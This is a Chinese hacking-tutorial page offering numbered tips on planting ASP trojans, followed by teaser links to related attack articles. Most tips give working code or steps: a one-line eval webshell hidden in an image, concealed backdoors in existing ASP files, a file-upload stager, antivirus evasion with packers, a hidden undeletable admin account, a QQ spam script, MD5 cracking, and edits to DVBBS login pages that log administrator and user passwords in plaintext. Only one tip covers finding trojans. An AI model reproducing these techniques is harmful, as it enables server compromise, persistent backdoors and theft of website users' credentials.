教你成为ASP木马高手                
                
                    所属分类:
                        网络安全 / 黑客教程                    
                    阅读数:
                        172
                    
                        收藏 0赞 0分享
                    
                 
                
                    1.名称:如何制作图片ASP木马 (可显示图片) 
建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 
了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#) ) </SCRIPT> 
2. 名称:整蛊网吧 
先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享, 
复制一个木马过去运行即可。 
3.名称:感受MD5暴力破解的魅力 
rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all" 
1和7代表密码最小和最大长度 
阿汀我再加个方法:http://md5.rednoize.com/ 在线破解 
或者到http://www.md5lookup.com/?category=01-3&;searck=on 
4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳 
的时候最好多选择不知名的加壳软件 
5.名称:隐蔽的插入型ASP木马 
(1)在我们要做手脚的asp文件里加入如下内容 
<%if request("action")="ok" then%> 
shell代码插在这里,最好是小马,还要加密一下 
<%end if%> 
访问的时候在你作手脚的asp文件后面加上?action=ok,即可 
(2)另一种方法,在我们要做手脚的asp文件里加入如下内容 
<% 
on error resume next 
strFileName = Request.QueryString("filer") 
set objStream = Server.createObject("ABODB.Stream") 
objStream.Type = 1 
objStream.Open 
objStream.LoadFromFile strFileName 
objStream.SaveToFile Server.mappath("ating.asp"),2 
%> 
访问的时候在做手脚的asp文件后面加上?filer=XXX 
XXX为你本地上传的一个路径如 c:ating123.asp 
上传后在做手脚的asp的同文件夹中有ating,asp 
(3)前提得到system权限, 
进入网站目录下一层 
mkdir s… 
copy ating.asp s…/ 
这样杀毒软件找不到的 
访问http://网站/s…/ating.asp即可 
6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为: 
hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的 
7.名称:QQ群脚本攻击 
打开qq对话诓,复制消息,然后 
下面的内容保存为.vbs 文件,运行即可 
Set WshShell= WScript.createobject("WScript.Shell") 
WshShell.AppActivate "QQ信息攻击脚本" 
for i=1 to 20 
WScript.Sleep 1000 
WshShell.SendKeys"^v" 
WshShell.SendKeys i 
WshShell.SendKeys "%s" 
Next 
8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可 
9. 名称:全面找出你站上的ASP木马 
(1) 用杀毒软件 
(2) 用FTP客户端软件,点"工具"->"比较文件夹" 
(3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马 
(4) 用工具Beyond Compare 
10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画 
(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样 
老办法: 
修改admin_login.asp得到明文DVBBS后台密码 
在"username=trim(replace(request("username")这行后面 
Dim fsoObject 
Dim tsObject 
Set fsoObject = Server.createObject("Scripting.FileSystemObject") 
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) 
tsObject.Write CStr(request("password")) 
Set fsoObject = Nothing 
Set tsObject = Nothing 
只要管理员登陆后台,在目录下就生成了laner.txt 
(2)login.asp中Case "login_chk"下: 
on error resume next 
Dim rain 
set rain=server.createobject("adodb.stream") 
rain.Type=2 
rain.CharSet="gb2312" 
rain.Position=rain.Size 
rain.Open 
rain.LoadFromFile server.MapPath("laner.asp") 
rain.writetext now&request("username")&"text:"&request("password")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
这样laner.asp将获得全部登陆人的登陆时间,用户名和密码 
(3)如果你有自己的网站或者另外的webshell(强烈建议使用): 
可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: 
<%if request("n")<>"" and request("p")<>"" then 
on error resume next 
Dim rain 
set rain=server.createobject("adodb.stream") 
rain.Type=2 
rain.CharSet="gb2312" 
rain.Position=rain.Size 
rain.Open 
rain.LoadFromFile server.MapPath("laner.asp") 
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
end if%> 
                                    
             
            
                
                CSRF的攻击方式详解 黑客必备知识
CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF
                    
                    收藏 0赞 0分享
抓取管理员hash值(哈希)的另类方法
哈希算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计
                    
                    收藏 0赞 0分享
网站安全教程 绕过D盾进行注入的方法(图文教程)
D盾_IIS防火墙专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
                    
                    收藏 0赞 0分享
局域网安全教程 HSRP攻击和防范的方法介绍(图文教程)
热备份路由器协议(HSRP)的设计目标是支持特定情况下 IP 流量失败转移不会引起混乱、并允许主机使用单路由器,以及即使在实际第一跳路由器使用失败的情形下仍能维护路由器间的连通性。换句话说,当源主机不能动态知道第一跳路由器的 IP 地址时,HSRP 协议能够保护第一
                    
                    收藏 0赞 0分享
SQL通用防注入系统asp版漏洞
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
                    
                    收藏 0赞 0分享
                 查看更多